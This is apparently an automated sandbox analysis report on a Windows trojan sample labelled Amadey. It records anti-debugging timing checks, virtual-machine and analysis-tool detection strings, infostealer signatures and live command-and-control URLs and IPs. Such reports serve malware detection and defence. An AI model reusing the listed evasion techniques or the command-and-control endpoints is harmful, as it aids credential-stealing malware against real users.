Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0939 second address: 6DA0991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 pushfd 0x00000006 jmp 00007F8E2D690EF3h 0x0000000b add ax, 25AEh 0x00000010 jmp 00007F8E2D690EF9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8E2D690EF8h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0991 second address: 6DA0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0995 second address: 6DA099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA099B second address: 6DA09AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA09AC second address: 6DA09B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0BE5 second address: 6DA0C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 mov ax, bx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f jmp 00007F8E2D68FC5Dh 0x00000014 push dword ptr [ebp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0C0A second address: 6DA0C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0C10 second address: 6DA0C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E10B2A second address: 6E10B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E10B2E second address: 6E10B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F8E2D68FC69h 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F8E2D68FC5Ah 0x00000017 sbb si, D6E8h 0x0000001c jmp 00007F8E2D68FC5Bh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E10B6F second address: 6E10BDB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8E2D690EF8h 0x00000008 and ax, E948h 0x0000000d jmp 00007F8E2D690EEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov bh, cl 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov dh, 20h 0x0000001d mov ebx, ecx 0x0000001f popad 0x00000020 mov dl, byte ptr [ebp+14h] 0x00000023 jmp 00007F8E2D690EF4h 0x00000028 mov eax, dword ptr [ebp+10h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8E2D690EF7h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E10BDB second address: 6E10C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8E2D68FC5Fh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F8E2D68FC69h 0x0000000f jmp 00007F8E2D68FC5Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 and dl, 00000007h 0x0000001b jmp 00007F8E2D68FC66h 0x00000020 test eax, eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F8E2D68FC5Ch 0x00000029 mov edi, esi 0x0000002b popad 0x0000002c mov di, si 0x0000002f popad 0x00000030 je 00007F8E9DBF5201h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 movsx edi, ax 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E0046E second address: 6E00473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E00473 second address: 6E0049D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8E2D68FC64h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E0049D second address: 6E004A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E004A3 second address: 6E004F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F8E2D68FC5Eh 0x00000011 mov ebp, esp 0x00000013 jmp 00007F8E2D68FC60h 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F8E2D68FC60h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E004F1 second address: 6E00527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F8E2D690EF3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E00527 second address: 6E0052C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E0052C second address: 6E00532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSpecial instruction interceptor: First address: D8DC85 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSpecial instruction interceptor: First address: D8DB8C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSpecial instruction interceptor: First address: D8B20E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSpecial instruction interceptor: First address: FBFC65 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow / User API: threadDelayed 1812Jump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow / User API: threadDelayed 954Jump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow / User API: threadDelayed 931Jump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 2976Thread sleep time: -110055s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 280Thread sleep time: -116058s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 1444Thread sleep time: -3625812s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 2876Thread sleep time: -1908954s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 992Thread sleep time: -1862931s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: S0O8qbVwLk.exe, S0O8qbVwLk.exe, 00000000.00000002.2953801000.0000000000F16000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: S0O8qbVwLk.exeBinary or memory string: Hyper-V RAW
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: S0O8qbVwLk.exe, 00000000.00000002.2953801000.0000000000F16000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: S0O8qbVwLk.exe, 00000000.00000003.2949226344.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949064428.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2948769870.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2678930752.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949584945.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2956104477.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2926759037.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2948933338.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949494327.00000000013E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile opened: NTICE
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile opened: SICE
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeProcess queried: DebugPortJump to behavior
Source: S0O8qbVwLk.exe, S0O8qbVwLk.exe, 00000000.00000002.2953801000.0000000000F16000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~Program Manager
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.6:49717 -> 147.45.113.159:80
Source: global trafficTCP traffic: 192.168.2.6:49725 -> 147.45.113.159:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping741
Security Software Discovery		Remote Services11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		Security Account Manager12
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials214
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
S0O8qbVwLk.exe66%ReversingLabsWin32.Trojan.Amadey
S0O8qbVwLk.exe100%AviraTR/Crypt.TPM.Gen
S0O8qbVwLk.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20pn.top
147.45.113.159
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlS0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322seS0O8qbVwLk.exe, 00000000.00000003.2950368067.0000000001377000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2955647121.0000000001379000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://html4/loose.dtdS0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://home.twentytk20pn.top/WES0O8qbVwLk.exe, 00000000.00000003.2926759037.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2948933338.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949494327.00000000013E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://httpbin.org/ipbeforeS0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlS0O8qbVwLk.exe, S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://curl.se/docs/alt-svc.htmlS0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://.cssS0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322::3S0O8qbVwLk.exe, 00000000.00000003.2950368067.0000000001377000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2955647121.0000000001379000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://.jpgS0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFS0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  98.85.100.80
                                  		httpbin.orgUnited States
                                  		11351TWC-11351-NORTHEASTUSfalse
                                  147.45.113.159
                                  		home.twentytk20pn.topRussian Federation
                                  		2895FREE-NET-ASFREEnetEUfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578955
                                  Start date and time:2024-12-20 17:04:06 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 24s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:4
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:S0O8qbVwLk.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:308b5cef77c672f677d2245307116688.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@27/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 27
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.109.210.53
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target S0O8qbVwLk.exe, PID 6216 because there are no executed function
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: S0O8qbVwLk.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  11:05:45API Interceptor223647x Sleep call for process: S0O8qbVwLk.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  98.85.100.80QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                    EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                      h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                        icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                            u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                  CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                    u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                      147.45.113.159EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                      • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                      oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                      • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                      f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                      • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                      u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                      1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                      • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                      • twentytk20pn.top/v1/upload.php
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                      • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=2Rb3R6cTcShMDFLr1734664370
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                      • twentytk20pn.top/v1/upload.php
                                                      file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                      • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=aMcIUlaEFPceCafP1734635514
                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                      • twentytk20pn.top/v1/upload.php

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      home.twentytk20pn.topEMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                      • 147.45.113.159
                                                      oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                      • 147.45.113.159
                                                      f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                      • 147.45.113.159
                                                      u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 147.45.113.159
                                                      1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                      • 147.45.113.159
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                      • 147.45.113.159
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                      • 147.45.113.159
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                      • 147.45.113.159
                                                      file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                      • 147.45.113.159
                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                      • 147.45.113.159
                                                      httpbin.orgnojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                                      • 34.226.108.155
                                                      QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                                      • 98.85.100.80
                                                      WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
